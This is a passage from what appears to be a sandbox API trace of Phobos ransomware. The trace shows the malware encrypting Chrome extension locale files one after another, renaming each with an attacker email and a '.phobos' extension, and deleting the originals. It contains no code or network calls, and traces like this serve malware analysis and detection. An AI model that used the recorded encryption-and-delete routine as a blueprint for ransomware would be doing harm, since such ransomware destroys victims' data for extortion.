dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.117] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.117] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x109, lpOverlapped=0x0) returned 1 [0151.118] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.118] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.122] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.122] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.122] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.122] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.122] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.122] CloseHandle (hObject=0x138) returned 1 [0151.122] CloseHandle (hObject=0x134) returned 1 [0151.122] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json")) returned 1 [0151.124] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.124] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=259) returned 1 [0151.124] CloseHandle (hObject=0x134) returned 1 [0151.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json")) returned 0x2020 [0151.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.125] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.125] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.126] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.126] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.126] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x103, lpOverlapped=0x0) returned 1 [0151.127] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.127] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.128] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.128] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.128] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.128] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.128] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.128] CloseHandle (hObject=0x134) returned 1 [0151.128] CloseHandle (hObject=0x138) returned 1 [0151.128] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json")) returned 1 [0151.129] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.130] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=243) returned 1 [0151.130] CloseHandle (hObject=0x138) returned 1 [0151.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json")) returned 0x2020 [0151.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.130] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.130] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.131] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.131] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf3, lpOverlapped=0x0) returned 1 [0151.132] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.132] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.133] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.133] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.133] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.133] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.133] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.133] CloseHandle (hObject=0x138) returned 1 [0151.133] CloseHandle (hObject=0x134) returned 1 [0151.133] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json")) returned 1 [0151.134] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.135] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=256) returned 1 [0151.135] CloseHandle (hObject=0x134) returned 1 [0151.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json")) returned 0x2020 [0151.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.135] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.135] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.135] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x100, lpOverlapped=0x0) returned 1 [0151.138] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.138] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.139] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.139] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.139] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.139] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.139] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.139] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.139] CloseHandle (hObject=0x134) returned 1 [0151.139] CloseHandle (hObject=0x138) returned 1 [0151.140] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json")) returned 1 [0151.147] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.148] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=329) returned 1 [0151.148] CloseHandle (hObject=0x138) returned 1 [0151.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json")) returned 0x2020 [0151.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.148] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.148] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.149] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.149] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x149, lpOverlapped=0x0) returned 1 [0151.149] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0151.150] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0151.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.150] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.150] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.150] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.150] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.151] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.151] CloseHandle (hObject=0x138) returned 1 [0151.151] CloseHandle (hObject=0x134) returned 1 [0151.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 